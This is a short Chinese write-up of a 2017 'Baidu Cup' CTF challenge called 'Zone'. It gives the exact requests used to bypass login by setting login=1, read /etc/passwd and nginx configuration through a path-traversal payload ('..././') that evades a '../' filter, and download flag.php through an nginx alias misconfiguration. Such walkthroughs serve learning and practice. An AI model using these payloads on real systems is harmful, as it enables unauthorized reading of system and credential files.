“百度杯”CTF比赛 2017 二月场--Zone
提示未登录
BP抓包修改login=1,成功登录
点击manage抓包,修改login=1,返回包中发现有个302页面跳转
尝试访问系统配置文件
GET /manages/admin.php?module=/etc/passwd&name= 无回显
GET /manages/admin.php?module=../../../etc/passwd&name= 无回显
怀疑过滤了../ 尝试用..././
GET /manages/admin.php?module=..././..././..././etc/passwd&name=
成功回显
中间尝试时,返回404中显示是nginx
打开自己的kali,终端输入:find / -name "nginx.conf"
查找配位文件的位置为/etc/nginx/nginx.conf
GET /manages/admin.php?module=..././..././..././etc/nginx/nginx.conf&name=
返回包中发现
GET /manages/admin.php?module=..././..././..././etc/nginx/sites-enabled/default&name=
返回包中发现
autoindex on 意为打开了目录浏览
访问/online-movies ,发现页面上显示../即可浏览目录下载文件。
扫描网站后台路径得到robots.txt,访问得到存在flag.php
访问路径:/online-movies../var/www/html/flag.php
下载flag.php得到flag值